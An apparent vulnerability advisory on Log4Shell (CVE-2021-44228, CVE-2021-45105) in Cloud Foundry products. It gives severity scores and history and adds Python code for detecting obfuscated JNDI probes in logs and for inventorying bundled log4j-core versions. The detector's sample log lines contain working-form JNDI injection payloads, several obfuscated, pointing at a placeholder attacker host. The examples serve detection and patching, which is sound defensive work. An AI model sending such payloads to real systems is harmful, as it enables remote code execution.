10 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
9.3 High
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
Severity
Critical
Vendor
Cloud Foundry Foundation
Description
A critical vulnerability in Apache Log4j, CVE-2021-44228, has been publicly disclosed. Log4j versions prior to 2.15.0 are subject to remote code execution through the JNDI lookup feature (typically abused over LDAP), and this may allow remote code execution in affected Cloud Foundry products.
This is an ongoing event; please check this advisory frequently for updates as they develop. The advisory has been extended to also cover CVE-2021-45105, which was later identified in Log4j versions below 2.17.0.
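What a Log4Shell probe looks like in request logs, and why a plain `${jndi:` grep misses the obfuscated forms that circulated: the detector below is an added example written for this page, not code from the Cloud Foundry project. It statically folds the `${lower:...}`, `${upper:...}` and `${...:-default}` nesting tricks the way Log4j's lookup substitution would, URL-decodes once, and then matches. The log lines are constructed placeholders in a gorouter-like access-log shape, and `attacker.invalid` is a reserved placeholder hostname.

```python
"""Obfuscation-aware detector for Log4Shell (CVE-2021-44228) lookup strings.

Added example, not part of the Cloud Foundry advisory. The sample log lines
below are constructed; the hostnames in them are placeholders.
"""
import re
from urllib.parse import unquote

# A ${...} expression with no further ${ } nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once nesting has been flattened.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body: str):
    """Statically evaluate one innermost lookup the way Log4j 2 would.

    Returns the replacement text, or None if the lookup cannot be resolved
    without a live environment (in which case it is left in place).
    """
    if body.lower().lstrip().startswith("jndi:"):
        return None                      # never fold the thing we are hunting
    if ":-" in body:                     # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    name, sep, key = body.partition(":")
    if sep and name.strip().lower() in ("lower", "upper"):
        return key.lower()               # case is irrelevant to the matcher
    return None


def normalize(payload: str, max_rounds: int = 64) -> str:
    """Collapse nested lookups such as ${${lower:j}ndi:...} to ${jndi:...}."""
    text = unquote(payload)              # one layer of URL decoding (query strings)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            out = _resolve(m.group(1))
            if out is None:
                return m.group(0)
            changed = True
            return out

        text = INNERMOST.sub(repl, text)
        if not changed:
            break
    return text


def is_log4shell_probe(line: str) -> bool:
    return JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (1-based line number, normalized text) for every hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits


# Constructed sample gorouter-style access log lines (placeholders, not real traffic).
SAMPLE_LOG = [
    'app.example.test - [2021-12-10T12:00:00Z] "GET /health HTTP/1.1" 200 user_agent:"curl/7.79"',
    'app.example.test - [2021-12-10T12:00:01Z] "GET / HTTP/1.1" 200 user_agent:"${jndi:ldap://attacker.invalid/a}"',
    'app.example.test - [2021-12-10T12:00:02Z] "GET / HTTP/1.1" 200 user_agent:"${${lower:j}ndi:${lower:l}dap://attacker.invalid/a}"',
    'app.example.test - [2021-12-10T12:00:03Z] "GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Aldap%3A%2F%2Fattacker.invalid%2Fa%7D HTTP/1.1" 200',
    'app.example.test - [2021-12-10T12:00:04Z] "GET / HTTP/1.1" 200 user_agent:"${${env:NOTHING:-j}ndi:rmi://attacker.invalid/a}"',
    'app.example.test - [2021-12-10T12:00:05Z] "GET /?price=${ctx:userId} HTTP/1.1" 200',
]

if __name__ == "__main__":
    for n, norm in scan(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Run it over gorouter access logs or application logs exported from the platform. It decodes only one layer of URL encoding and folds only lookups that can be evaluated without a live environment (an `${env:...}` with no default is left in place), so a line that still contains a nested `${${...}...}` construct after normalization deserves a look even when no `${jndi:` surfaces.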
Affected Cloud Foundry Products and Versions
Severity is critical unless otherwise noted.
Mitigation
Users of affected products are strongly encouraged to follow the mitigations below. The Cloud Foundry project recommends upgrading to the following releases (for both CVEs above):
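Before applying the upgrades it helps to know which log4j-core version each deployed artifact actually bundles, since a droplet, buildpack cache, war or fat jar can carry its own copy. The scanner below is an added example written for this page, not Cloud Foundry tooling. It uses the version thresholds this advisory states (fixed in 2.15.0 and 2.17.0); the `pom.properties` path is the standard Maven marker that log4j-core jars ship, and removal of `JndiLookup.class` is treated as a stop-gap for CVE-2021-44228 only. The sample archives are constructed in a temporary directory and contain only those marker entries, not real bytecode. The Java 7 backport line (2.12.x) is not modelled.

```python
"""Inventory log4j-core versions inside jar/war/ear files and classify them
against the version thresholds stated in this advisory.

Added example, not code from the Cloud Foundry project. The sample archives
are constructed; they contain only a pom.properties marker (and, for some,
an empty stand-in JndiLookup.class entry), not real Log4j bytecode.
"""
import io
import os
import re
import shutil
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")

# Thresholds as stated in the advisory: fixed in 2.15.0 and 2.17.0.
# The 2.12.x Java 7 backports are deliberately not modelled here.
THRESHOLDS = [((2, 15, 0), "CVE-2021-44228"), ((2, 17, 0), "CVE-2021-45105")]


def parse_version(text):
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    return (int(m[1]), int(m[2]), int(m[3] or 0)) if m else None


def classify(version, jndi_lookup_present):
    """Return the CVE ids this log4j-core version is exposed to."""
    if version is None:
        return ["unknown-version"]
    cves = [cve for floor, cve in THRESHOLDS if version < floor]
    # Deleting JndiLookup.class was the documented stop-gap for CVE-2021-44228;
    # it does nothing for the CVE-2021-45105 recursion bug.
    if not jndi_lookup_present:
        cves = [c for c in cves if c != "CVE-2021-44228"]
    return cves


def inspect_archive(zf, path, findings):
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.*)$", props, re.M)
        version = parse_version(m[1]) if m else None
        findings.append((path, version, classify(version, JNDI_LOOKUP in names)))
    # Recurse into nested archives (fat jars, WEB-INF/lib/*.jar, ...).
    for name in names:
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{path}!{name}", findings)
            except zipfile.BadZipFile:
                pass  # not a real archive despite the extension


def scan_tree(root):
    """Walk a directory (e.g. an extracted droplet) and return all findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                with zipfile.ZipFile(full) as zf:
                    inspect_archive(zf, os.path.relpath(full, root), findings)
    return findings


def _fake_log4j_core(version, with_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar (marker entries only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n"
                               "artifactId=log4j-core\n")
        if with_jndi_lookup:
            zf.writestr(JNDI_LOOKUP, b"")  # empty stand-in, not real bytecode
    return buf.getvalue()


def build_sample_tree():
    """Constructed fixtures: a vulnerable jar, a 2.14.1 jar with JndiLookup
    stripped, a fixed 2.17.0 jar, and a war bundling 2.16.0 in WEB-INF/lib."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    fixtures = {
        "log4j-core-2.14.1.jar": _fake_log4j_core("2.14.1"),
        "patched-2.14.1-nojndi.jar": _fake_log4j_core("2.14.1", with_jndi_lookup=False),
        "log4j-core-2.17.0.jar": _fake_log4j_core("2.17.0"),
    }
    for name, data in fixtures.items():
        with open(os.path.join(root, name), "wb") as f:
            f.write(data)
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.16.0.jar", _fake_log4j_core("2.16.0"))
    return root


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        for path, version, cves in scan_tree(root):
            print(f"{path}: log4j-core {version} -> {cves or 'not affected'}")
    finally:
        shutil.rmtree(root)
```

Point `scan_tree` at an extracted droplet, a buildpack cache, or a BOSH release's packages directory. A jar that ships log4j-core classes without the Maven marker (shaded or repackaged) will not be reported, so treat an empty result as "nothing found", not "nothing present".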
References:
https://vulners.com/cve/CVE-2021-44228
https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
History
2021-12-13: Initial vulnerability report published.
2021-12-14: Updated with patch details for cf-for-k8s.
2021-12-15: Updated CredHub, UAA and PHP buildpack versions to the latest Log4j 2.16 releases.
2021-12-18: Updated cf-for-k8s, cf-deployment and Java buildpack versions to the latest Log4j 2.16 releases.
2022-01-06: Updated UAA, Java buildpack, PHP buildpack and cf-for-k8s versions with fixes for CVE-2021-45105.